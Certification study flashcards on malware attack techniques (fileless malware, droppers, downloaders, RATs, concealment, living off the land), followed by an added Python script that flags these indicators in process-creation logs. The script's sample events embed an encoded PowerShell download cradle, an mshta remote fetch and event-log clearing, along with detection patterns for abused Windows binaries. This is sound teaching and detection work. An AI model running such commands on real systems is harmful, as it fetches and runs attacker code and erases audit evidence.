Section 6.57 Malware Attack Techniques Flashcards
Objective 2.4: Given a scenario, analyse indicators of malicious activity
Malware Attack Techniques
Specific method by which malware code penetrates and infects a targeted system
Some malware infects only the system’s memory and then uses the operating system’s own remote procedure call mechanisms to act across the organization’s network, never touching the disk of the host it runs on
■ Much modern malware uses fileless techniques to avoid detection by
signature-based security software, which looks for known patterns in files stored on disk
■ Fileless malware runs its code as a process in system memory without writing an executable to the local file system of the infected host
How does this modern malware work?
When a user accidentally clicks a malicious link or opens a malicious file, the first piece of malware installed is known as a stage one dropper or downloader
Stage 1 Dropper or Downloader
Piece of malware that is usually written as lightweight shellcode
that can be executed on a given system
Dropper
Specific malware type designed to initiate or run other malware
forms within a payload on an infected host
Downloader
Retrieves additional tools after the initial infection facilitated by a
dropper
The primary function of a stage one dropper or downloader is to retrieve
additional portions of the malware code and to trick the user into activating it
Shellcode
Broader term for lightweight code meant to execute an exploit on a given
target; the name comes from early payloads whose only job was to spawn a command shell
Stage 2 Downloader
Downloads and installs a remote access Trojan (RAT) so the threat actor can conduct command and control of the victimised system
“Actions on Objectives” Phase
Threat actors carry out their primary objectives, such as
■ data exfiltration
■ file encryption
Concealment
Used to help the threat actor prolong unauthorised access to a system by
■ hiding tracks
■ erasing log files
■ hiding any evidence of malicious activity
“Living off the Land”
■ A strategy adopted by many Advanced Persistent Threats (APTs)
and criminal organizations
■ The threat actors abuse the standard tools already present on the target (for example
PowerShell, WMI or other built-in administrative utilities) to perform the intrusion, so their activity blends in with legitimate administration and no custom binary has to be dropped
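Added example, not from the original flashcards and not from any vendor tool: a small Python triage script that checks process-creation records for the indicators described in the stage one dropper/downloader, concealment and living-off-the-land cards above (an Office application spawning a script host, an encoded PowerShell download cradle fetching the next stage into memory, abused built-in binaries, and event-log clearing). The record layout (parent image, image, command line), the indicator lists and the sample events are assumptions constructed for this example; the URLs use the reserved .invalid domain and resolve nowhere.

```python
"""Flag process-creation events that carry stage 1 downloader, living-off-the-land
and concealment indicators. Example code, not part of the original page; the event
layout mimics a Sysmon/EDR "process created" record and the samples are constructed."""
import base64
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    parent: str   # image path of the parent process
    image: str    # image path of the created process
    cmdline: str  # full command line


@dataclass
class Finding:
    technique: str  # stage1_downloader | living_off_the_land | concealment
    reason: str


# Script hosts and built-in Windows binaries routinely abused to run attacker code
# without dropping a custom executable (illustrative subset, not an exhaustive list).
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
LOLBINS = {"mshta.exe", "regsvr32.exe", "rundll32.exe", "certutil.exe", "bitsadmin.exe", "wmic.exe"}
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# A "download cradle": fetch code over the network and run it without saving a file.
DOWNLOAD_CRADLE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|invoke-expression|\biex\b|https?://", re.I)
# Command lines that wipe Windows event logs (concealment phase).
LOG_CLEARING = re.compile(r"wevtutil(\.exe)?\s+cl\b|clear-eventlog", re.I)
# powershell -EncodedCommand (and its short forms) followed by a base64 blob.
ENCODED_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.I)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str):
    """Return the plaintext of a PowerShell -EncodedCommand argument, or None.
    PowerShell expects base64 of the UTF-16LE script, not of UTF-8."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # not a real encoded command (or deliberately malformed)


def analyse(ev: ProcessEvent):
    image, parent = basename(ev.image), basename(ev.parent)
    findings = []
    text = ev.cmdline
    decoded = decode_encoded_command(text)
    if decoded is not None:
        findings.append(Finding("stage1_downloader", "encoded PowerShell command line"))
        text = f"{text} {decoded}"  # inspect the decoded script as well
    if image in SCRIPT_HOSTS | LOLBINS and DOWNLOAD_CRADLE.search(text):
        findings.append(Finding("stage1_downloader", "download cradle fetching next stage"))
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS | LOLBINS:
        findings.append(Finding("stage1_downloader", f"{parent} spawned {image}"))
    if image in LOLBINS:
        findings.append(Finding("living_off_the_land", f"abusable built-in binary {image}"))
    if LOG_CLEARING.search(text):
        findings.append(Finding("concealment", "event log clearing"))
    return findings


def encode_for_powershell(script: str) -> str:
    """Build a -EncodedCommand argument the way an attacker (or an admin) would."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample events for this example.
STAGE2_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s2')"
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe",
                 r"notepad.exe C:\Users\alice\notes.txt"),
    ProcessEvent(r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -nop -w hidden -enc " + encode_for_powershell(STAGE2_CRADLE)),
    ProcessEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\mshta.exe",
                 "mshta.exe http://example.invalid/p.hta"),
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"C:\Windows\System32\wevtutil.exe", "wevtutil.exe cl Security"),
]


def triage(events):
    """Map each event index to the techniques it indicates (empty list = no finding)."""
    return {i: [f.technique for f in analyse(ev)] for i, ev in enumerate(events)}


if __name__ == "__main__":
    for i, ev in enumerate(SAMPLE_EVENTS):
        for f in analyse(ev):
            print(f"event {i}: {basename(ev.image)} -> {f.technique}: {f.reason}")
```

The decoder uses UTF-16LE because that is what PowerShell's -EncodedCommand expects, so a blob that decodes as base64 but not as UTF-16LE is treated as "not an encoded command" rather than crashing the triage. These are indicators, not proof: administrators legitimately clear logs and run certutil or wmic, so each finding still needs context (parent process, user, timing, what else the host did next) before it is called an incident.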